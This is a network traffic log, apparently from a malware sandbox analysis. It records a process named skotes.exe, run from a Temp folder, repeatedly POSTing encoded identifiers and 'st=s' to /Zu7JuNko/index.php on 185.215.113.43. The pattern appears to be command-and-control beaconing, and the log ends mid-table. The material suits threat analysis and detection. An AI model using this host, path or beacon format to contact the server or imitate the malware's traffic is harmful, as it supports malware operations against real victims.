Nov 4, 2024 17:34:23.428941965 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:24.351301908 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50258	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:25.985459089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:26.905550957 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50259	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:28.420186043 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:29.348114014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50260	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:30.976979017 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:31.905230045 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50264	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:33.432583094 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:34.358560085 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50265	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:35.991261005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:36.906147003 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50266	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:38.422987938 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:39.344856977 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50267	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:40.981173038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:41.908235073 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50268	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:43.440943003 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:44.360799074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50269	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:45.991591930 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:46.905071974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50270	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:48.425780058 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:49.330298901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50272	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:50.960302114 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:51.860423088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50273	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:53.374016047 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:54.305461884 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50274	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:55.927226067 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:56.838073015 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50275	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:58.450355053 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:59.367636919 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50276	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:01.258181095 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:02.188229084 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50278	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:04.005033016 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:04.921773911 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50279	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:06.816852093 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:07.726664066 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50280	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:10.148447990 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:11.064397097 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50281	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:12.688435078 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:13.602165937 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50282	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:15.123943090 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:16.024677992 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50283	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:17.660676956 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:18.577142954 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50284	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:20.091270924 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:21.007550001 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50285	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
